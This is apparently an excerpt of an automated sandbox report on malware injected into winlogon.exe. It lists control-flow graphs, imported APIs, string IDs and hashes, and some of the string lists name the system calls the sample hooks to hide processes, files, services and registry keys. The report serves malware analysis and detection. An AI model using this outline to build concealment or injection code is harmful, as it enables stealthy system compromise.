2d0165e2cdd-2d0165e2cea 605->612 613 2d0165e2d0c-2d0165e2d19 606->613 614 2d0165e2d3a-2d0165e2d3d 606->614 607->608 609 2d0165e2dc7-2d0165e2dd4 608->609 610 2d0165e2df5-2d0165e2df8 608->610 609->610 616 2d0165e2dd6-2d0165e2de3 609->616 617 2d0165e2dfa-2d0165e2e03 call 2d0165e1bbc 610->617 618 2d0165e2e05-2d0165e2e12 lstrlenW 610->618 619 2d0165e2ced-2d0165e2cf3 612->619 613->614 620 2d0165e2d1b-2d0165e2d28 613->620 621 2d0165e2d3f-2d0165e2d49 call 2d0165e1bbc 614->621 622 2d0165e2d4b-2d0165e2d58 lstrlenW 614->622 625 2d0165e2de6-2d0165e2dec 616->625 617->618 636 2d0165e2e4a-2d0165e2e55 617->636 631 2d0165e2e14-2d0165e2e1e 618->631 632 2d0165e2e35-2d0165e2e3f call 2d0165e3844 618->632 629 2d0165e2cf9-2d0165e2cfe 619->629 630 2d0165e2d93-2d0165e2d98 619->630 633 2d0165e2d2b-2d0165e2d31 620->633 621->622 621->630 626 2d0165e2d5a-2d0165e2d64 622->626 627 2d0165e2d7b-2d0165e2d8d call 2d0165e3844 622->627 635 2d0165e2dee-2d0165e2df3 625->635 625->636 626->627 637 2d0165e2d66-2d0165e2d79 call 2d0165e152c 626->637 627->630 640 2d0165e2e42-2d0165e2e44 627->640 629->606 629->619 630->640 631->632 641 2d0165e2e20-2d0165e2e33 call 2d0165e152c 631->641 632->640 633->630 642 2d0165e2d33-2d0165e2d38 633->642 635->610 635->625 645 2d0165e2ecc-2d0165e2ed0 636->645 646 2d0165e2e57-2d0165e2e5b 636->646 637->627 637->630 640->603 640->636 641->632 641->636 642->614 642->633 645->603 650 2d0165e2e5d-2d0165e2e61 646->650 651 2d0165e2e63-2d0165e2e7d call 2d0165e85c0 646->651 650->651 654 2d0165e2e80-2d0165e2e83 650->654 651->654 657 2d0165e2ea6-2d0165e2ea9 654->657 658 2d0165e2e85-2d0165e2ea3 call 2d0165e85c0 654->658 657->645 660 2d0165e2eab-2d0165e2ec9 call 2d0165e85c0 657->660 658->657 660->645
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                    • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                    • API String ID: 2119608203-3850299575
                                                                    • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                    • Instruction ID: d3b596ab05dff9b38269f4f9cd95cbcd315625dbf01702ec5e409f4043454db4
                                                                    • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                    • Instruction Fuzzy Hash: 40B18166210AD18AEF648FA5DD887A9B3A5FB44BC4F849017EE0D537A8DF36CE41C740
                                                                    Function 000002D0165E7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                    • String ID:
                                                                    • API String ID: 3140674995-0
                                                                    • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                    • Instruction ID: 20d5fac5d31b6f1b1b7ff7f3eed5433fc4695a7276fd3db9f08efe4689facb88
                                                                    • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                    • Instruction Fuzzy Hash: 8A311C76205BC08AEB609FA0EC947ED7365F785744F84442ADA4E57BA8EF39CA48C710
                                                                    Function 000002D0165ED2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                    • String ID:
                                                                    • API String ID: 1239891234-0
                                                                    • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                    • Instruction ID: 3b7d1831335daaf51ebfd733c592f0e35ffd938c3d674718b742b5f189087fd6
                                                                    • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                    • Instruction Fuzzy Hash: 09314036214FC086EB60CF65EC843AE73A4F789754F940226EA9D47BA5DF39CA55CB00
                                                                    Function 000002D0165E12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                    • String ID: d
                                                                    • API String ID: 2005889112-2564639436
                                                                    • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                    • Instruction ID: e3e3399429e55960cf070cc16a5005b5190db7e605521ce6618ec048f68560e7
                                                                    • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                    • Instruction Fuzzy Hash: BE517F76200B8486EB60CFA2E88879AB7A1F788FC9F844126DE4D07768DF3DC545CB10
                                                                    Function 000002D0165E1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentThread$AddressHandleModuleProc
                                                                    • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                    • API String ID: 4175298099-1975688563
                                                                    • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                    • Instruction ID: 9dee3d71542fb905587bd6568b7d178f2fe6f5c2276b71c2ce632fa0ceebaf95
                                                                    • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                    • Instruction Fuzzy Hash: B731C2A5500ACAA0EF50EFE5ECD97D4B324BB04385FC09563A42D02179AF79CF49C7A0
                                                                    Function 000002D016586910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 415 2d016586910-2d016586916 416 2d016586918-2d01658691b 415->416 417 2d016586951-2d01658695b 415->417 419 2d01658691d-2d016586920 416->419 420 2d016586945-2d016586984 call 2d016586fc0 416->420 418 2d016586a78-2d016586a8d 417->418 424 2d016586a9c-2d016586ab6 call 2d016586e54 418->424 425 2d016586a8f 418->425 422 2d016586938 __scrt_dllmain_crt_thread_attach 419->422 423 2d016586922-2d016586925 419->423 438 2d01658698a-2d01658699f call 2d016586e54 420->438 439 2d016586a52 420->439 427 2d01658693d-2d016586944 422->427 429 2d016586931-2d016586936 call 2d016586f04 423->429 430 2d016586927-2d016586930 423->430 436 2d016586ab8-2d016586aed call 2d016586f7c call 2d016586e1c call 2d016587318 call 2d016587130 call 2d016587154 call 2d016586fac 424->436 437 2d016586aef-2d016586b20 call 2d016587190 424->437 431 2d016586a91-2d016586a9b 425->431 429->427 436->431 447 2d016586b31-2d016586b37 437->447 448 2d016586b22-2d016586b28 437->448 450 2d016586a6a-2d016586a77 call 2d016587190 438->450 451 2d0165869a5-2d0165869b6 call 2d016586ec4 438->451 442 2d016586a54-2d016586a69 439->442 453 2d016586b39-2d016586b43 447->453 454 2d016586b7e-2d016586b94 call 2d01658268c 447->454 448->447 452 2d016586b2a-2d016586b2c 448->452 450->418 469 2d0165869b8-2d0165869dc call 2d0165872dc call 2d016586e0c call 2d016586e38 call 2d01658ac0c 451->469 470 2d016586a07-2d016586a11 call 2d016587130 451->470 458 2d016586c1f-2d016586c2c 452->458 459 2d016586b4f-2d016586b5d call 2d016595780 453->459 460 2d016586b45-2d016586b4d 453->460 472 2d016586bcc-2d016586bce 454->472 473 2d016586b96-2d016586b98 454->473 466 2d016586b63-2d016586b78 call 2d016586910 459->466 482 2d016586c15-2d016586c1d 459->482 460->466 466->454 466->482 469->470 518 2d0165869de-2d0165869e5 __scrt_dllmain_after_initialize_c 469->518 470->439 491 2d016586a13-2d016586a1f call 2d016587180 470->491 480 2d016586bd0-2d016586bd3 472->480 481 2d016586bd5-2d016586bea call 2d016586910 472->481 473->472 479 2d016586b9a-2d016586bbc call 2d01658268c call 2d016586a78 473->479 479->472 512 2d016586bbe-2d016586bc6 call 2d016595780 479->512 480->481 480->482 481->482 500 2d016586bec-2d016586bf6 481->500 482->458 502 2d016586a21-2d016586a2b call 2d016587098 491->502 503 2d016586a45-2d016586a50 491->503 506 2d016586bf8-2d016586bff 500->506 507 2d016586c01-2d016586c11 call 2d016595780 500->507 502->503 517 2d016586a2d-2d016586a3b 502->517 503->442 506->482 507->482 512->472 517->503 518->470 519 2d0165869e7-2d016586a04 call 2d01658abc8 518->519 519->470
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436521860.000002D016580000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d016580000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                    • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                    • API String ID: 190073905-1786718095
                                                                    • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                    • Instruction ID: dd7692e2b99b60a86f76d6b3ad3452ab25c272ff970cedf1c1e1e01c02871081
                                                                    • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                    • Instruction Fuzzy Hash: 8B81B1616102E186FB50ABE7DCDD3592298EB85B88FD48027AA4D47FB7DB38CD458720
                                                                    Function 000002D0165ECE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetLastError.KERNEL32 ref: 000002D0165ECE37
                                                                    • FlsGetValue.KERNEL32(?,?,?,000002D0165F0A6B,?,?,?,000002D0165F045C,?,?,?,000002D0165EC84F), ref: 000002D0165ECE4C
                                                                    • FlsSetValue.KERNEL32(?,?,?,000002D0165F0A6B,?,?,?,000002D0165F045C,?,?,?,000002D0165EC84F), ref: 000002D0165ECE6D
                                                                    • FlsSetValue.KERNEL32(?,?,?,000002D0165F0A6B,?,?,?,000002D0165F045C,?,?,?,000002D0165EC84F), ref: 000002D0165ECE9A
                                                                    • FlsSetValue.KERNEL32(?,?,?,000002D0165F0A6B,?,?,?,000002D0165F045C,?,?,?,000002D0165EC84F), ref: 000002D0165ECEAB
                                                                    • FlsSetValue.KERNEL32(?,?,?,000002D0165F0A6B,?,?,?,000002D0165F045C,?,?,?,000002D0165EC84F), ref: 000002D0165ECEBC
                                                                    • SetLastError.KERNEL32 ref: 000002D0165ECED7
                                                                    • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000002D0165F0A6B,?,?,?,000002D0165F045C,?,?,?,000002D0165EC84F), ref: 000002D0165ECF0D
                                                                    • FlsSetValue.KERNEL32(?,?,00000001,000002D0165EECCC,?,?,?,?,000002D0165EBF9F,?,?,?,?,?,000002D0165E7AB0), ref: 000002D0165ECF2C
                                                                      • Part of subcall function 000002D0165ED6CC: HeapAlloc.KERNEL32 ref: 000002D0165ED721
                                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002D0165F0A6B,?,?,?,000002D0165F045C,?,?,?,000002D0165EC84F), ref: 000002D0165ECF54
                                                                      • Part of subcall function 000002D0165ED744: HeapFree.KERNEL32 ref: 000002D0165ED75A
                                                                      • Part of subcall function 000002D0165ED744: GetLastError.KERNEL32 ref: 000002D0165ED764
                                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002D0165F0A6B,?,?,?,000002D0165F045C,?,?,?,000002D0165EC84F), ref: 000002D0165ECF65
                                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002D0165F0A6B,?,?,?,000002D0165F045C,?,?,?,000002D0165EC84F), ref: 000002D0165ECF76
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: Value$ErrorLast$Heap$AllocFree
                                                                    • String ID:
                                                                    • API String ID: 570795689-0
                                                                    • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                    • Instruction ID: 6cb119c879d4005e3e486556fd0f16809afcb4c169a1b85a080ac9ab7b906ee7
                                                                    • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                    • Instruction Fuzzy Hash: D14162212016C546FF69A7F95DDE369E2425B447B0FD4472BB83E0A7F6DE2ACE418200
                                                                    Function 000002D0165E2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                    • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                    • API String ID: 2171963597-1373409510
                                                                    • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                    • Instruction ID: 27c92a905a2f4f6f1a7d1a88f5f4c691c2a465980edda73e2f7a22435be0af33
                                                                    • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                    • Instruction Fuzzy Hash: 92212F3661479082FB108B65F88875977A5F789BA5F904216EA5D03BB8DF7CC949CF00
                                                                    Function 000002D0165EA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                    • String ID: csm$csm$csm
                                                                    • API String ID: 849930591-393685449
                                                                    • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                    • Instruction ID: 3b43c7ab403b83ca95457f37da0d4b500b38ba5a1a126430ff915fab710d6147
                                                                    • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                    • Instruction Fuzzy Hash: 7BE14C72A047C08AEF60DFB5988839DB7A0F755798F900117EE8D57BA9CB36CA91C740
                                                                    Function 000002D016589944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436521860.000002D016580000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d016580000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                    • String ID: csm$csm$csm
                                                                    • API String ID: 849930591-393685449
                                                                    • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                    • Instruction ID: 8d33458c817a64122548c589ceefed1e9e6f3c6a843f5d4004e67bc5e997e060
                                                                    • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                    • Instruction Fuzzy Hash: 16E170726057808AEB60DFAAD8C839D77B8F755B98F900116EE8D57FA6CB34C991C700
                                                                    Function 000002D0165EF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeLibraryProc
                                                                    • String ID: api-ms-$ext-ms-
                                                                    • API String ID: 3013587201-537541572
                                                                    • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                    • Instruction ID: d0c3c69c08ddd6f5c27ead1c77a57a672af2ad5f3c132c9258f8044c477055ab
                                                                    • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                    • Instruction Fuzzy Hash: D0410622311A9091FF16CFEAAD88756A395B744BE0FC4412B9D4E877A4EE3ECE458310
                                                                    Function 000002D0165E104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                    • String ID: d
                                                                    • API String ID: 3743429067-2564639436
                                                                    • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                    • Instruction ID: 60b4ca63da48bf83ee31c643dec68d0684812f94169e8e12275eb22dcfa7cc50
                                                                    • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                    • Instruction Fuzzy Hash: F4416273614BC4C6EB64CFA1E88879EB7A1F388B99F448116DA8D07768DF39C945CB40
                                                                    Function 000002D0165ED068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FlsGetValue.KERNEL32(?,?,?,000002D0165EC7DE,?,?,?,?,?,?,?,?,000002D0165ECF9D,?,?,00000001), ref: 000002D0165ED087
                                                                    • FlsSetValue.KERNEL32(?,?,?,000002D0165EC7DE,?,?,?,?,?,?,?,?,000002D0165ECF9D,?,?,00000001), ref: 000002D0165ED0A6
                                                                    • FlsSetValue.KERNEL32(?,?,?,000002D0165EC7DE,?,?,?,?,?,?,?,?,000002D0165ECF9D,?,?,00000001), ref: 000002D0165ED0CE
                                                                    • FlsSetValue.KERNEL32(?,?,?,000002D0165EC7DE,?,?,?,?,?,?,?,?,000002D0165ECF9D,?,?,00000001), ref: 000002D0165ED0DF
                                                                    • FlsSetValue.KERNEL32(?,?,?,000002D0165EC7DE,?,?,?,?,?,?,?,?,000002D0165ECF9D,?,?,00000001), ref: 000002D0165ED0F0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: Value
                                                                    • String ID: 1%$Y%
                                                                    • API String ID: 3702945584-1395475152
                                                                    • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                    • Instruction ID: 7080bbce82f1be4da0ddcc39a1ebc959a46846a47c0639f49ef077fcb6817628
                                                                    • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                    • Instruction Fuzzy Hash: F51133617042C442FF6857ED5DDD369E2415B447F0FD84327A83E466FAEE2ACE428600
                                                                    Function 000002D0165E7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                    • String ID:
                                                                    • API String ID: 190073905-0
                                                                    • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                    • Instruction ID: cc22ab156fd64d921cb8bab48c84aed77748f638e97627413a858d82ffff3ace
                                                                    • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                    • Instruction Fuzzy Hash: 2E819F216007C186FF50ABE5ACC93B9E690EB85784FD4442BEA4D477B6EB3ACE45C700
                                                                    Function 000002D0165E9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                                    • String ID: api-ms-
                                                                    • API String ID: 2559590344-2084034818
                                                                    • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                    • Instruction ID: aca1f05cb46fc00515c66d976e56b7ae3e88fb2388c081806b711800b0246c42
                                                                    • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                    • Instruction Fuzzy Hash: 5031B821312BD1D1EF15DBD2AC88755A3A4B748BA0FD909279E1D477B0EF3ACA558310
                                                                    Function 000002D0165F3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                    • String ID: CONOUT$
                                                                    • API String ID: 3230265001-3130406586
                                                                    • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                    • Instruction ID: d628bd0090cde46b23efa145587aed2904a5f36c40d9d109057e4cb8b91bb961
                                                                    • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                    • Instruction Fuzzy Hash: 71118F31310BD086E7508BA2EC88719B6A4F788FE5F944266EE5E877B5CF78CC148744
                                                                    Function 000002D0165E2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$AllocFree
                                                                    • String ID: dialer
                                                                    • API String ID: 756756679-3528709123
                                                                    • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                    • Instruction ID: a1042e87f8364f6b2e966bad11af8e790b8d99eaa053b685ef812c5dffe2a578
                                                                    • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                    • Instruction Fuzzy Hash: 6531B522701B9186EB14CF96DD88769B7A0FB44BC0F8881229E4C47B75EF3ACD618700
                                                                    Function 000002D0165E14A4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 70memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$Free
                                                                    • String ID: C:\Windows\system32\winlogon.exe
                                                                    • API String ID: 3168794593-3603389050
                                                                    • Opcode ID: d27b9b8ca154d9eedff1e610dfbacc8608a6d25d7c3fe3b6d17278c798082fda
                                                                    • Instruction ID: 7f7260ef79563c5a266f126e1a848f4d5cc61924374436ce50858df01a2f744e
                                                                    • Opcode Fuzzy Hash: d27b9b8ca154d9eedff1e610dfbacc8608a6d25d7c3fe3b6d17278c798082fda
                                                                    • Instruction Fuzzy Hash: 8621A0AB508AE08AE760DFB59CD9B9D37A1F749B44F894057DB4D83367DE25CC088720
                                                                    Function 000002D0165ECFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: Value$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 2506987500-0
                                                                    • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                    • Instruction ID: 881857e728745ec88ca4b8388d6fa749b937d482b05cecb59b8676985d1b6840
                                                                    • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                    • Instruction Fuzzy Hash: B7113D212052C482FF64A7F99DDD329E2426B947B0F945727A83E477F6EE6ACE418600
